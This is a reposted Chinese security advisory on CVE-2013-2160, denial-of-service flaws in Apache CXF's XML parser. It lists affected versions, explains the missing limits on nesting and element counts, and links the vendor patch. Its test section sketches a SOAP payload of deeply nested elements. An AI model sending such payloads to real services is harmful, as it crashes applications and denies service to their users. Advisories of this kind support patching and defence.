Apache CXF多个远程拒绝服务漏洞(CVE-2013-2160)

最新推荐文章于 2025-04-23 11:38:43 发布

weixin_30426879

最新推荐文章于 2025-04-23 11:38:43 发布

阅读量517

点赞数

文章标签：前端 ViewUI

原文链接：http://www.cnblogs.com/security4399/p/3185094.html

版权

Apache CXF是一个开源服务框架，其特定版本（2.5.10、2.6.7、2.7.4）存在远程拒绝服务漏洞。此漏洞允许攻击者通过构造特定的XML解析请求，导致应用程序崩溃，进而引发拒绝服务。已发布官方补丁进行修复。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞版本:

Apache Group CXF <= 2.5.10
Apache Group CXF 2.7.4
Apache Group CXF 2.6.7

漏洞描述:

BUGTRAQ  ID: 61030
CVE(CAN) ID: CVE-2013-2160

Apache CXF是一个开源服务框架，用于使用JAX-WS、JAX-RS等前端编程API编译和开发服务。

Apache CXF 2.5.10, 2.6.7, 2.7.4存在多个远程拒绝服务漏洞，流XML解析器没有限制元素数、属性数、接收文档嵌套结构等，攻击者利用这些漏洞可造成应用崩溃，导致拒绝服务。

<* 参考

http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc?version=1&amp;modificationDate=1372

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<?xml version='1.0'?>
<soap:Envelopexmlns:soap='http://www.example.com/2003/05/soap-envelope';>
<soap:Body>
<element>
<element>
<element>
<element>
[thousands more]
</element>
</element>
</element>
</element>
</soap:Body>
</soap:Envelope>

安全建议:

厂商补丁：

Apache Group
------------
Apache Group已经为此发布了一个安全公告（CVE-2013-2160）以及相应补丁:
CVE-2013-2160：Denial of Service Attacks on Apache CXF
链接：http://cxf.apache.org/security-advisories.data/CVE-2013-2160.txt.asc?version=1&modificationDate=1372

转载于:https://www.cnblogs.com/security4399/p/3185094.html